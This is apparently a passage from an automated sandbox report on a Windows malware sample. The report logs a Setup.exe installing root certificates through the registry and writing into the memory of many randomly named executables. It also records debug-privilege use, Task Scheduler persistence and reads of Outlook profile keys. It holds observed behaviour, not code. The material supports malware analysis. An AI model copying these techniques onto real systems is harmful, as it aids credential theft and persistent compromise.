2df4d2aea496d49c12b272df7f10419a9b8c9522553134b3d8ca0b5a2e5366d3c40bdd85d56425329ab85694a7e04e4e8a413d8bc44009e90011c45b8cdc380dcdd55885e13ff3ec10203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604143c14b0c4f79ee701ce7a068006a734b505c19e88300d06092a864886f70d01010b0500038201010015e6471828cc1ad1330221f32e5d6d2f9e51edb41cb38e1f9a52d26af2a229342cd18b8a3f23e7c26a546276ffd1d09ae010447dc52d62a7e3f879b2f8e1b9df10c5695b7e4c47172142f599df8ae70ef357d1b1e9eba9d385a1f5eae798b035e0e8fbd753c9c43e3c232e935f4de301f46a2b1aece9eca64686b46ea7e69f8e538e0a5e5b759e4c9eafdae6ba2f57aa66eff15b28323e30e67cfd145c60c2940bd927247dc5a5c09954901f8215cb530909fc8c4c60b03daae8e23d62dcd80beae9eaf18dea862c7d000b86eda4dc7b2197aa53bdc96c0c37f5c90e1b07d343cc468887683123d95a054e1174ea018a61d88865d66c833702722508d7d5a02d C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1468 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe
PID 1468 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe
PID 1468 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe
PID 1468 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe
PID 1468 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1468 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe
PID 1468 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe
PID 1468 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe
PID 1468 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe
PID 1468 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 544 wrote to memory of 2668 N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A

outlook_win_path

Description Indicator Process Target
